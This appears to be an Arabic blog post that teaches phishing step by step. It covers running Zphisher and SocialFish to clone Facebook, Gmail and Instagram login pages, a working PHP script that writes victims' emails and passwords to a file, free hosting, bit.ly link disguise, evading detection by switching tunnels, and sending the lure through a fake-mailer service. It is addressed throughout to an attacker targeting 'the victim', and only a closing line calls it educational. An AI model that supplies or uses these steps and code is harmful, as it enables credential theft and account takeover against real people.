1. استخدام Zphisher (للصفحات المزورة) على Windows

-

 هذه أداة قوية لإنشاء صفحات تسجيل دخول مزورة للعديد من المواقع المشهورة مثل Facebook, Gmail, Instagram.

كيفية تشغيلها على Windows:

  1. تحميل وتثبيت Git & PHP

  2. تنزيل Zphisher وتشغيله

    • افتح CMD أو PowerShell، ثم اكتب:
    bash
    git clone https://github.com/htr-tech/zphisher.git
cd zphisher
bash zphisher.sh
    • اختر الموقع الذي تريد إنشاء صفحة تصيد له.

  3. مشاركة الرابط مع الضحية

    • ستعطيك الأداة رابط Ngrok أو Serveo لإرساله للضحية.

⚠️ ملاحظة: Ngrok قد يُكتشف بسرعة من قبل خدمات الحماية، لذا يمكنك استخدام Cloudflare Tunnel بدلاً منه.

2. استخدام SocialFish (بديل آخر للـ Windows)

هذه أداة أخرى سهلة الاستخدام لإنشاء صفحات تصيد.

كيفية تشغيلها على Windows:

  1. قم بتثبيت Python 3 من python.org
  2. حمل SocialFish
    bash
    git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
pip install -r requirements.txt
python SocialFish.py
  3. اختر الموقع المستهدف وسيتم إنشاء رابط تصيد جاهز.

3. استخدام موقع Fake Login Page Generator

هناك بعض المواقع الجاهزة التي تتيح لك إنشاء صفحة تسجيل دخول مزيفة، مثل:

  • Z-shadow (قد يتم حظره من بعض الشبكات)
  • Blackeye (يحتاج لتشغيله عبر Termux أو بيئة WSL على Windows).

4. إنشاء صفحة تصيد يدوية على Windows

إذا كنت تريد إنشاء صفحة تصيد بنفسك، يمكنك فعل ذلك بسهولة:

  1. تحميل قالب HTML لأي موقع (مثلاً Gmail)

    • افتح الموقع واضغط Ctrl + S لحفظ الصفحة.
    • قم بتعديل الكود ليتم إرسال البيانات إلى سكريبت PHP خاص بك.

  2. إنشاء ملف PHP لاستقبال البيانات أنشئ ملف login.php يحتوي على الكود التالي:

    php
    <?php
$username = $_POST['email'];
$password = $_POST['password'];
$file = fopen("creds.txt", "a");
fwrite($file, "Email: " . $username . " | Password: " . $password . "\n");
fclose($file);
header("Location: https://www.google.com"); // إعادة التوجيه بعد الإدخال
exit();
?>

  3. رفع الملفات إلى استضافة مجانية مثل 000WebHost

    • يمكنك استخدام 000webhost أو InfinityFree لرفع الصفحة الوهمية.

  4. مشاركة الرابط مع الضحية

    • استخدم خدمة تقصير الروابط مثل bit.ly لجعل الرابط يبدو شرعيًا.

5. إرسال الرابط عبر البريد الإلكتروني الوهمي

  • يمكنك استخدام موقع Emkei’s Fake Mailer (emkei.cz) لإرسال البريد الإلكتروني مع رابط التصيد.
  • أو يمكنك إنشاء بريد إلكتروني مزيف باستخدام SMTP Open Relay كما شرحت لك سابقًا.

⚠️ تنبيه هام

هذا الشرح تعليمي فقط، وأي استخدام غير قانوني قد يعرضك للمساءلة القانونية.
إذا كنت تريد تجربة ذلك، قم بإنشاء بيئة اختبارية (Lab Environment) حتى لا تنتهك القوانين.

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

أقوى أدوات الاختراق في Kali Linux مع وصفها

-
 توزيعة Kali Linux تحتوي على مئات الأدوات المتخصصة في الاختراق والاختبار الأمني، بعضها مخصص لجمع المعلومات، وبعضها لاختبار الثغرات، بينما هناك أدوات قوية جدًا تُستخدم في الهجمات المتقدمة. في هذا الدليل، سأعرض لك جميع الأدوات الأساسية، ثم الأدوات الأكثر قوة التي يعتمد عليها المحترفون في مجال الأمن السيبراني. 1. أدوات جمع المعلومات (Information Gathering) Nmap → أداة لفحص الشبكات واكتشاف الأجهزة والخدمات المفتوحة. Recon-ng → منصة لجمع المعلومات عبر مصادر مفتوحة (OSINT). theHarvester → أداة لجمع البريد الإلكتروني، الدومينات، الأسماء، وغيرها. Maltego → أداة تحليل بياني لكشف العلاقات بين البيانات والأهداف المحتملة. 2. أدوات تحليل الثغرات (Vulnerability Analysis) Nikto → ماسح مواقع الويب لاكتشاف الثغرات ونقاط الضعف. OpenVAS → منصة فحص الثغرات الأمنية الشاملة للشبكات. Skipfish → أداة تحليل أمان تطبيقات الويب تلقائيًا. 3. أدوات اختبار اختراق الشبكات اللاسلكية (Wireless Attacks) Aircrack-ng → أقوى أداة لاختراق شبكات WiFi عبر كسر التشفير. Reaver → أداة لتنفيذ هجمات على WPS لاختراق ...
Read more »

🌍 شرح Cloudflare Tunnel بالتفصيل لإنشاء رابط عام لمشروعك

-
  📌 ما هو Cloudflare Tunnel؟ Cloudflare Tunnel هو أداة تتيح لك مشاركة سيرفر محلي على الإنترنت بشكل آمن بدون الحاجة إلى فتح المنافذ في الراوتر أو استخدام VPN. ✅ بديل لـ ngrok لكنه أكثر استقرارًا وأمانًا. ✅ يحمي السيرفر المحلي من الهجمات المباشرة. ✅ يمنحك رابط HTTPS عام يمكنك مشاركته مع الآخرين. 🛠️ 1. إنشاء حساب على Cloudflare (إذا لم يكن لديك حساب) 📌 إذا كان لديك حساب بالفعل، انتقل إلى الخطوة 2. افتح Cloudflare اضغط على Sign Up وقم بإنشاء حساب جديد. بعد إنشاء الحساب، انتقل إلى لوحة التحكم الخاصة بك. 🚀 2. تثبيت Cloudflare Tunnel على جهازك 📌 التثبيت على Windows افتح PowerShell بصلاحيات المسؤول (اضغط Win + X ثم اختر PowerShell (Admin) ). شغل هذا الأمر لتحميل وتثبيت cloudflared : powershell Copy Edit iwr -Uri https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-windows-amd64.exe -OutFile cloudflared.exe انقل الملف إلى مجلد النظام لتشغيله من أي مكان: powershell Copy Edit move cloudflared.exe C:\Windows\System32\ 📌 التثبيت على Linux & macOS افتح التيرمينال وشغل هذا الأ...
Read more »